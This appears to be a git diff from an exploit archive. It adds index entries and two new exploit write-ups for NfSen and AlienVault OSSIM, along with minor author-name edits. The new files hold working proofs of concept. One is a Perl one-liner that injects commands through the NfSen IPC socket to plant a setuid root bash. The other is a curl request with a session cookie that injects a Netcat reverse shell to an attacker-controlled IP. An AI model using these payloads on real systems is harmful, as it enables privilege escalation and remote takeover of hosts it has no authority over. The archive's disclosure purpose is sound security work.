diff --git a/files.csv b/files.csv index f0c0ec080..8547530fb 100644 --- a/files.csv +++ b/files.csv @@ -9060,6 +9060,7 @@ id,file,description,date,author,platform,type,port 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0 41887,platforms/windows/local/41887.txt,"VirusChaser 8.0 - Buffer Overflow (SEH)",2017-04-14,0x41Li,windows,local,0 +42305,platforms/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Privilege Escalation",2017-07-10,"Paul Taylor",linux,local,0 41886,platforms/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local,0 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 @@ -14335,7 +14336,7 @@ id,file,description,date,author,platform,type,port 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 -31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0 +31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote,0 31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,php,remote,0 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 @@ -15571,7 +15572,7 @@ id,file,description,date,author,platform,type,port 40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 -40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 +40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer 9 - 'jscript9' Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0 40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0 @@ -15689,6 +15690,7 @@ id,file,description,date,author,platform,type,port 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0 42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 +42306,platforms/linux/remote/42306.txt,"NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 diff --git a/platforms/linux/local/42305.txt b/platforms/linux/local/42305.txt new file mode 100755 index 000000000..f751ce568 --- /dev/null +++ b/platforms/linux/local/42305.txt @@ -0,0 +1,30 @@ +# Exploit Title: Local root exploit affecting NfSen <= 1.3.7, AlienVault USM/OSSIM <= 5.3.6 +# Version: NfSen 1.3.7 +# Version: AlienVault 5.3.6 +# Date: 2017-07-10 +# Vendor Homepage: http://nfsen.sourceforge.net/ +# Vendor Homepage: http://www.alienvault.com/ +# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download +# Exploit Author: Paul Taylor / Foregenix Ltd +# Website: http://www.foregenix.com/blog +# Tested on: AlienVault USM 5.3.6 +# CVE: CVE-2017-6970 + +1. Description + +The web user (in AlienVault USB www-data) has access to the NfSen IPC UNIX domain socket. This can be used to send a crafted command (complete with shell metacharacter injection) to the NfSen Perl components, causing OS command injection in a root privilege context, and therefore can be leverage for privilege escalation from the web user to full root privileges. + +2. Proof of Concept + +Pre-requisites - web user/www-data shell (e.g. web shell, or reverse shell). + +Execute the following command: + +perl -e 'use Socket; socket(my $nfsend, AF_UNIX, SOCK_STREAM, 0); connect($nfsend, sockaddr_un("/var/nfsen/run/nfsen.comm")); print $nfsend "run-nfdump\nargs=-h \$(bash -c \"cp /bin/bash /tmp\")\n.\nrun-nfdump\nargs=-h \$(bash -c \"chmod u+s /tmp/bash\")\n.\n";' + +This will create a set uid root bash binary in /tmp, which can then be used to gain full root privileges. + +3. Solution: + +Update to latest version of NfSen/USM/OSSIM + diff --git a/platforms/linux/remote/42306.txt b/platforms/linux/remote/42306.txt new file mode 100755 index 000000000..4e5c9dab5 --- /dev/null +++ b/platforms/linux/remote/42306.txt @@ -0,0 +1,33 @@ +# Exploit Title: NfSen/AlienVault remote root exploit (IPC query command injection) +# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected. +# Version: AlienVault 5.3.4 +# Date: 2017-07-10 +# Vendor Homepage: http://nfsen.sourceforge.net/ +# Vendor Homepage: http://www.alienvault.com/ +# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download +# Exploit Author: Paul Taylor / Foregenix Ltd +# Website: http://www.foregenix.com/blog +# Tested on: AlienVault USM 5.3.4 +# CVE: CVE-2017-6971 +1. Description + +A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system. + +2. Proof of Concept +# From a linux bash prompt on the attacker's machine: + +# Set target IP +targetip='10.100.1.1' + +# Set desired command to inject (in this case a reverse shell, using Netcat which is conveniently available on an AlienVault USM All-In-One): +cmd='nc -ne /bin/bash 10.100.1.2 443'; + +# Set the PHPSESSID of an authenticated session which has *already* submitted at least one valid NfSen query for processing via the Web UI. +PHPSESSID='offq09ckq66fqtvdd0vsuhk5c7'; + +# Next use curl to send the exploit +curl -o /dev/null -s -k -b "PHPSESSID=$PHPSESSID" -d "process=Process&output=custom+...&customfmt=%0A.%0Arun-nfdump%0Aargs=-h; $cmd #" https://$targetip/ossim/nfsen/nfsen.php + +3. Solution: + +Update to latest version of NfSen/USM/OSSIM diff --git a/platforms/windows/remote/31694.py b/platforms/windows/remote/31694.py index 041d6d21d..2f96217f8 100755 --- a/platforms/windows/remote/31694.py +++ b/platforms/windows/remote/31694.py @@ -10,7 +10,7 @@ banner = """ #################################################################################### ### ### -### Coded by: Muhammad EL Harmeel m.harmeel(at)gmail(dot)com ### +### Coded by: Muhammad ELHarmeel @0xhandler ### ### ### ####################################################################################